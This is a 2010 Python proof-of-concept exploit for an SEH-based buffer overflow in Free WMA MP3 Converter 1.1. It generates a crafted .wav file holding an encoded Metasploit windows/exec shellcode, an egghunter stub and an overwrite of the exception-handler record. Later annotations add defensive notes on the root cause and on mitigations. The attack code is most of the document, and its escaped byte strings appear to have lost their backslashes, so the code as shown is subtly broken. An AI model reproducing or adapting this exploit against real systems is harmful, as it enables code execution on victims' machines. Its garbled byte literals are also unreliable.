
# Title : Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Published : 2010-11-12
# Author : Dr_IDE


#!/usr/bin/env python
##############################################################################
#
# Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Date:         November 10, 2010
# Download:     http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:    Windows XPSP3
# Greets:       edb team
# Notes:	Egghunter was for fun, not required though.
#
###############################################################################

# Proof-of-concept file generator: builds one long string and writes it to
# 'Dr_IDE.wav' in the current directory. Per the title, the target is the
# audio-file parser of Free WMA MP3 Converter 1.1 (tested by the author on
# Windows XP SP3).
#
# Defender notes:
#   * Root cause is presumably an unchecked copy of file data into a fixed-size
#     stack buffer (the title says "Buffer Overflow (SEH)"); the durable fix is
#     a length check in the parser -- confirm against a vendor advisory.
#   * The output starts with 1000 repeats of one filler string, not a RIFF/WAVE
#     header, so file-type validation or a magic-byte check on ".wav" inputs
#     would reject it before parsing.
#   * Long runs of a single repeated filler value (buf1, buf2, junk below) are
#     a cheap heuristic for content scanners and triage.
#   * SafeSEH, SEHOP and DEP are the platform mitigations aimed at this class
#     of exception-handler overwrite.

# Payload description as supplied by the author: Metasploit windows/exec,
# alpha_upper encoded, command "calc" (the customary harmless demo command).
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# Egg is already injected
# The first two four-value groups of `code` repeat the same tag that also
# appears inside `eggy` below; this is what the author's "Egg" remark refers to.
code=(
"x80x87x78x68x80x87x78x68x89xe1xd9xeexd9x71xf4x58x50x59"
"x49x49x49x49x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38x41x43"
"x4ax4ax49x4bx4cx4ax48x47x34x43x30x45x50x45x50x4cx4bx51"
"x55x47x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4cx4bx50"
"x4fx45x48x4cx4bx51x4fx51x30x43x31x4ax4bx51x59x4cx4bx50"
"x34x4cx4bx43x31x4ax4ex46x51x49x50x4cx59x4ex4cx4dx54x49"
"x50x42x54x45x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4cx4bx51x4fx47"
"x54x45x51x4ax4bx45x36x4cx4bx44x4cx50x4bx4cx4bx51x4fx45"
"x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51"
"x4cx46x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50x56x42"
"x44x4cx4bx51x56x50x30x4cx4bx51x50x44x4cx4cx4bx44x30x45"
"x4cx4ex4dx4cx4bx43x58x45x58x4bx39x4ax58x4dx53x49x50x42"
"x4ax50x50x43x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43x51x42x4cx42"
"x43x43x30x41x41")

# Small stub the author calls an egghunter; the header notes it was included
# "for fun" and is not required.
eggy=(
"x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x80x87x78x68x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

# Eight repeats of a padding value, used twice in the final layout.
nops=("x90" * 8)
# Two four-value fields placed immediately after the first 4116 characters of
# data; the names suggest the "next" and "handler" fields of an SEH record.
nseh=("xEBx06x90x90")
# Author's note: address of a pop/pop/ret sequence inside Wmpcon.exe, described
# as "universal". NOTE(review): that wording suggests the module loads at a
# fixed base and is not SafeSEH-protected -- not verifiable from this page.
rseh=("xEFxF7x4Ax00")
# Leading filler: 1000 repeats.
buf1=("x41" * 1000)
# Filler sized so that buf1 + nops + code + buf2 has length 4116.
buf2=("x42" * (4116 - len(buf1+nops+code)))
# Trailing filler sized from 8000 minus buf1, buf2, nseh and rseh only; it does
# not subtract nops, code or eggy, so the written string is longer than 8000.
junk=("x43" * (8000 - len(buf1+buf2+nseh+rseh)))

# Final layout, in order: filler, padding, payload, filler, the two SEH fields,
# padding, egghunter stub, trailing filler.
evil=(buf1+nops+code+buf2+nseh+rseh+nops+eggy+junk);

# Writes the string in text mode to a fixed file name in the working directory,
# replacing any existing file of that name.
f1 = open('Dr_IDE.wav','w');
f1.write(evil);
f1.close();

#[http://pocoftehday.blogspot.com]